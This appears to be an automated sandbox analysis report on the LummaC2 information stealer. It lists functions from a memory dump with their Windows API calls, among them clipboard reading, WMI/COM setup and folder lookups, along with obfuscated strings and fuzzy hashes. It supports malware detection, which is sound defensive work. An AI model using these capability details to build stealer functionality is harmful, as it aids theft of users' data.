Instruction Fuzzy Hash: 102261219087EA89DB32C63C8C187DDBEA15B27324F0843D9D1E96B3D2D7750B85CB66

Function 002C8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 002C8744
GetCurrentThreadId.KERNEL32 ref: 002C874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 002C8808
GetForegroundWindow.USER32 ref: 002C89A1
ExitProcess.KERNEL32 ref: 002C8A17

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7576bf1c83d1e8e7128658554cef28b16264834e27c146b4d673dcf8a031f8fd
Instruction ID: 585da8260bca995eab967ef6f2be33666c47a68603d9770aef7e14c94c690593
Opcode Fuzzy Hash: 7576bf1c83d1e8e7128658554cef28b16264834e27c146b4d673dcf8a031f8fd
Instruction Fuzzy Hash: DB716973E143145FD318EE69DC4236AB6CB9BC0710F1F823EA998EB395ED758C118692

Function 002FBAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(002FEA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 002FBAFE

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 002FC59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9., xrefs: 002FC5F0

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.
API String ID: 2994545307-3220845746
Opcode ID: 07550bda16d77d0c0082bfc2663580a638ffcd999ec6b2128ae499ecaec52899
Instruction ID: 2dcd18341070fdbcd1fed1d072c67fdaf1a27457d99504a93573d08b5344ff9d
Opcode Fuzzy Hash: 07550bda16d77d0c0082bfc2663580a638ffcd999ec6b2128ae499ecaec52899
Instruction Fuzzy Hash: 6C114C30A152194BDB158F24DC647BAB7E9FB55334F28AA28C591F72E1C7309C148B40

Function 002FEEC0 Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc0d4b70235815df75ec1fef75ce2d5f321ac4a019e2f6f88721090ab4526ff7
Instruction ID: e392fb87381096eb2cc25cd82f5a4b62ae7f201a3329ea62a3e49e7cd471f4e1
Opcode Fuzzy Hash: fc0d4b70235815df75ec1fef75ce2d5f321ac4a019e2f6f88721090ab4526ff7
Instruction Fuzzy Hash: 45416A71315309AFE7258F24DDD0B7AF3AAEB88758F24463CE2C697265CA30BC20C641

Function 002FBC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 002FBCA2

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 27c3cf007702098061849b4e1bbe9ddda90d7643e59ae67ae495ce97e4640ba8
Instruction ID: b75198920be8e9e6aa226b50bdd46d698462ca641b44026075a1aca1035a1456
Opcode Fuzzy Hash: 27c3cf007702098061849b4e1bbe9ddda90d7643e59ae67ae495ce97e4640ba8
Instruction Fuzzy Hash: 29E04FB5E125499FCB49CF28EC604B977A9E75C300B04442AE503D7360DB35A912CB14

Function 002FA080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,7B1647F3,002C88F3,10130D9D), ref: 002FA090

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1c114fd26a0ae77a999e93d608ed83f4c536f5a79104982b3ce79db923c9c73c
Instruction ID: 7d9234334e2ac5948d1eac109fc02f278728231fcf79d33607534198324c1bdd
Opcode Fuzzy Hash: 1c114fd26a0ae77a999e93d608ed83f4c536f5a79104982b3ce79db923c9c73c
Instruction Fuzzy Hash: 24C09231095121ABCA252B14FC09FCA7F69EF493A0F1644A5F108A70B1CFB0ACD3DAD8

Non-executed Functions

Function 002F483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 002F484F
f, xrefs: 002F48B1
<, xrefs: 002F4992
<, xrefs: 002F4A3A
_, xrefs: 002F4A84
2, xrefs: 002F499A
>, xrefs: 002F4A43
`, xrefs: 002F48A3
0, xrefs: 002F4B4D
d, xrefs: 002F48BF
], xrefs: 002F4A94
1, xrefs: 002F491A
?, xrefs: 002F48F0
j, xrefs: 002F485D
8, xrefs: 002F4982
3, xrefs: 002F499E
h, xrefs: 002F486B
O, xrefs: 002F4880
l, xrefs: 002F4887
:, xrefs: 002F497A
b, xrefs: 002F4A7C
), xrefs: 002F4946
b, xrefs: 002F4895
f, xrefs: 002F4A8C
>, xrefs: 002F498A
0, xrefs: 002F49A2
n, xrefs: 002F4879

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$0$0$1$2$3$8$:$<$<$>$>$?$O$]$_$`$b$b$d$f$f$h$j$l$n$t
API String ID: 0-3467771618
Opcode ID: e2a6c33ca49a3b53f4e01391e5a9c1ff8f4431d67a4c9c806a4147d79859f1cf
Instruction ID: 6d0786bd5a4a043fd3f045ce6d4146230b00ca176b03dc51a3dd00c65996eb5c
Opcode Fuzzy Hash: e2a6c33ca49a3b53f4e01391e5a9c1ff8f4431d67a4c9c806a4147d79859f1cf
Instruction Fuzzy Hash: 0DE1A3219087E98EDB22C67C88543DDBFB15B53324F1843E9D4E86B3D2C7B54A85CB62

Function 002F1D10 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 002F1D59
GetSystemMetrics.USER32 ref: 002F1D69

Strings

8k0, xrefs: 002F1FB9
Pk0, xrefs: 002F1FDA
j0, xrefs: 002F1F4B
k0, xrefs: 002F1F98
0k0, xrefs: 002F1FAE
, xrefs: 002F1E56
pk0, xrefs: 002F2006
Hk0, xrefs: 002F1FCF
@k0, xrefs: 002F1FC4
hk0, xrefs: 002F1FFB
`k0, xrefs: 002F1FF0
j0, xrefs: 002F1F40
(k0, xrefs: 002F1FA3
Xk0, xrefs: 002F1FE5

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: MetricsSystem
String ID: $ k0$(k0$0k0$8k0$@k0$Hk0$Pk0$Xk0$`k0$hk0$pk0$j0$j0
API String ID: 4116985748-2536210187
Opcode ID: a5e4ae4046cc3515449c88fc85f0292ad8ee496ce421ce8dc68bf72d63c4f773
Instruction ID: 43a66360ecc029a335b4ba8dc12fa4cee032dc3da75739e3294c86216dea8d48
Opcode Fuzzy Hash: a5e4ae4046cc3515449c88fc85f0292ad8ee496ce421ce8dc68bf72d63c4f773
Instruction Fuzzy Hash: BCA18CB411E3818FD371DF19C46979BBBE0BB85308F50891DE4989B694C7B59458CF83

Function 002F6BF0 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 718memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0030168C,00000000,00000001,0030167C,00000000), ref: 002F6E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 002F6EDA
CoSetProxyBlanket.OLE32(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 002F6F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 002F6F6D
SysAllocString.OLEAUT32(BD01C371), ref: 002F7025
VariantInit.OLEAUT32(F8FBFAF5), ref: 002F7097
SysFreeString.OLEAUT32(?), ref: 002F7382
SysFreeString.OLEAUT32(?), ref: 002F7388
SysFreeString.OLEAUT32(00000000), ref: 002F7399

Strings

\, xrefs: 002F6DCB

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
String ID: \
API String ID: 2737081056-2967466578
Opcode ID: 4cda8898d6e4aa1d08c80499a7144c38850bd09547ccc2fb17ff3454c13a4d46
Instruction ID: 8b33c64c3541669fc93364660abe81194f146e4759f0974c18ebce108de617c6
Opcode Fuzzy Hash: 4cda8898d6e4aa1d08c80499a7144c38850bd09547ccc2fb17ff3454c13a4d46
Instruction Fuzzy Hash: D8320E71A183458FD314CF28C890B6BFBE5EF95350F188A2DEA958B291D774D805CB92

Function 002CB14F Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

BpAv, xrefs: 002CB1CC
.L~R, xrefs: 002CB181
9D,J, xrefs: 002CB173
DxY~, xrefs: 002CB1E0
EtEz, xrefs: 002CB1D6
'H%N, xrefs: 002CB17A
Kh;n, xrefs: 002CB1B8
6\/b, xrefs: 002CB19D
fPcV, xrefs: 002CB188
7, xrefs: 002CB5E9
gTuZ, xrefs: 002CB18F
;lMr, xrefs: 002CB1C2

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 'H%N$.L~R$6\/b$7$9D,J$;lMr$BpAv$DxY~$EtEz$Kh;n$fPcV$gTuZ
API String ID: 0-762781089
Opcode ID: d82881fb6ae12576b5c678354f2cb0fd8992518224212aa2b66b91cdd48805f9
Instruction ID: 9df1da5e8574194aa05c6d0c5dc3b7bd0a7ce6ca579f8431fae9bb03ecb38749
Opcode Fuzzy Hash: d82881fb6ae12576b5c678354f2cb0fd8992518224212aa2b66b91cdd48805f9
Instruction Fuzzy Hash: 3F02DBB5611B01CFD321CF25D8A1B96BBEAFF89300F14896DD5AA8B760CB75A841CF40

Function 002D0F71 Relevance: 14.5, Strings: 11, Instructions: 732COMMON

Download Yara Rule

Strings

T, xrefs: 002D186A
E, xrefs: 002D1872
V, xrefs: 002D187A
x, xrefs: 002D17E7
8, xrefs: 002D1571
*, xrefs: 002D1579
5, xrefs: 002D144C
F, xrefs: 002D0FF4
}, xrefs: 002D0F7F
t, xrefs: 002D12E2
F, xrefs: 002D1743

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: *$5$8$E$F$F$T$V$t$x$}
API String ID: 0-2030276459
Opcode ID: d6fbaecd4b9c3eed728c3eeb8c8641e16f2ce31690406cfe58fde8cb08a08a71
Instruction ID: ee99221d14e54da01ba7b468715cdd32eed3795cfae149e9b73246a2dba8fdbc
Opcode Fuzzy Hash: d6fbaecd4b9c3eed728c3eeb8c8641e16f2ce31690406cfe58fde8cb08a08a71
Instruction Fuzzy Hash: 9952907162D7908FD3249F38C4957AFBBE1ABC5314F188A2ED8D9C7782D67888518B43

Function 002E1550 Relevance: 14.2, Strings: 11, Instructions: 497COMMON

Download Yara Rule

Strings

R, xrefs: 002E195C
P, xrefs: 002E1961
!@, xrefs: 002E1583
e, xrefs: 002E176C
k, xrefs: 002E1762
U, xrefs: 002E1952
\, xrefs: 002E1B06
,, xrefs: 002E1A6C
\, xrefs: 002E175D
d, xrefs: 002E1767
[, xrefs: 002E1957

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$P$R$U$[$\$\$d$e$k
API String ID: 1279760036-3655135053
Opcode ID: b8bfc4eb968818cb16d78b3abcc9f304f50e98bd18bcd6a6b50063488c2f5c4b
Instruction ID: c060beea3875c1423d74baf0cb807c1034f731a63608bbb98e242c5941a6e0a1
Opcode Fuzzy Hash: b8bfc4eb968818cb16d78b3abcc9f304f50e98bd18bcd6a6b50063488c2f5c4b
Instruction Fuzzy Hash: 9222AE7166C7C18FD3248F29C4903AFBBE1AB96314F584A2DE4D687392D7B58864CB43

Function 002DE230 Relevance: 9.9, Strings: 7, Instructions: 1107COMMON

Download Yara Rule

Strings

f, xrefs: 002DE438
@Nxz, xrefs: 002DE536
]^he, xrefs: 002DE55E
vvFE, xrefs: 002DE546
FEtp, xrefs: 002DE5DF
pKp^, xrefs: 002DE54E
WYRT, xrefs: 002DE566

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @Nxz$FEtp$WYRT$]^he$f$pKp^$vvFE
API String ID: 0-4211064948
Opcode ID: 46ba60df66f66f76e6b69f6b5fb1b79e197f04008dba20cdd0556a11035415d1
Instruction ID: 574ab873c7cc856bc828c572de78320ffae189ebc57cd72ce85d7fc705cbe02b
Opcode Fuzzy Hash: 46ba60df66f66f76e6b69f6b5fb1b79e197f04008dba20cdd0556a11035415d1
Instruction Fuzzy Hash: 2572797151C3428FCB25DF28C85066EBBE2AFD5314F198A6EE4E58F392D6349C05CB82

Function 002D5640 Relevance: 9.7, Strings: 7, Instructions: 943COMMON

Download Yara Rule

Strings

s|}, xrefs: 002D606E
Fi, xrefs: 002D5D71
JHN], xrefs: 002D5D66
UR, xrefs: 002D5AE3
>j%h, xrefs: 002D5976
YU]&, xrefs: 002D6170
wq, xrefs: 002D6063

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
API String ID: 0-2664314784
Opcode ID: 5428af2e7a82ffb82229311c895c3a78bad7a6751eef74aaeb20df2680fd25f1
Instruction ID: 5364d2b543d1f0f97f5b95650441e6a78e08f2c7506c8ed50039bdb3154c4c29
Opcode Fuzzy Hash: 5428af2e7a82ffb82229311c895c3a78bad7a6751eef74aaeb20df2680fd25f1
Instruction Fuzzy Hash: 825267B15187518BD7249F28C851BAFB7E5FFC5310F188A2EE4898B3A1EB749D11CB42

Function 002D1A94 Relevance: 9.3, Strings: 7, Instructions: 531COMMON

Download Yara Rule

Strings

%, xrefs: 002D1E31
1, xrefs: 002D1C89
;, xrefs: 002D1B11
c, xrefs: 002D2059
', xrefs: 002D1AA7
], xrefs: 002D1DB7
U, xrefs: 002D205E

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: %$'$1$;$U$]$c
API String ID: 0-3216539101
Opcode ID: 63159800f758a110d7f1f873d5f96be3db26811891911143d63a3b5f9c1f4e1f
Instruction ID: 6c54fbe01d3cdd47a836c69afaf82a296df989c9c0c32c1dcbc8c2dcc075fe6f
Opcode Fuzzy Hash: 63159800f758a110d7f1f873d5f96be3db26811891911143d63a3b5f9c1f4e1f
Instruction Fuzzy Hash: B812E47152C7808BC7249F38C4953AFBBE1AF95320F148B2EE8E9873D2D6758855CB42

Function 002F1B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 002F1B24
GetClipboardData.USER32 ref: 002F1B3F
GlobalLock.KERNEL32 ref: 002F1B58
GetWindowLongW.USER32 ref: 002F1BC7
GlobalUnlock.KERNEL32 ref: 002F1CE7
CloseClipboard.USER32 ref: 002F1CF4

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 6d70b57def1bbec2bd5f63abfd37d1cf06b58f1da9474c4b10f66f991089efe3
Instruction ID: 09ed18cf2cccb653f95f864034916d831310f51d389a36ea14d3c7db679d1f5b
Opcode Fuzzy Hash: 6d70b57def1bbec2bd5f63abfd37d1cf06b58f1da9474c4b10f66f991089efe3
Instruction Fuzzy Hash: F051F07262C7818FC300AFBC888432EFAE1ABC5364F484B3EE6E4863D1D67485658753

Function 002E26D3 Relevance: 8.3, Strings: 6, Instructions: 769COMMON

Download Yara Rule

Strings

?<, xrefs: 002E2AB6
1{, xrefs: 002E2A0E
r~, xrefs: 002E2A16
20., xrefs: 002E3026
0, xrefs: 002E2888
zw, xrefs: 002E2A06

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$1{$20.$?<$r~$zw
API String ID: 0-949848952
Opcode ID: 94547dcfc73df08bd4a304cfa115f89872f5c7d4fb238faa1d8ed83fe7ef6ce8
Instruction ID: a66f016135025d2322a1f5b89ad526a60595b30724a9a86f41f02f56594eb25c
Opcode Fuzzy Hash: 94547dcfc73df08bd4a304cfa115f89872f5c7d4fb238faa1d8ed83fe7ef6ce8
Instruction Fuzzy Hash: 75426771618391CFD329CF29D8A076ABBE5FF85300F18896CE9D64B391DB748915CB82

Function 002C9290 Relevance: 7.9, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

clfg, xrefs: 002C92E2
CM, xrefs: 002C9608
C, xrefs: 002C95B5
RRP\, xrefs: 002C96DE
kj, xrefs: 002C9458
Egx|, xrefs: 002C92CA

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

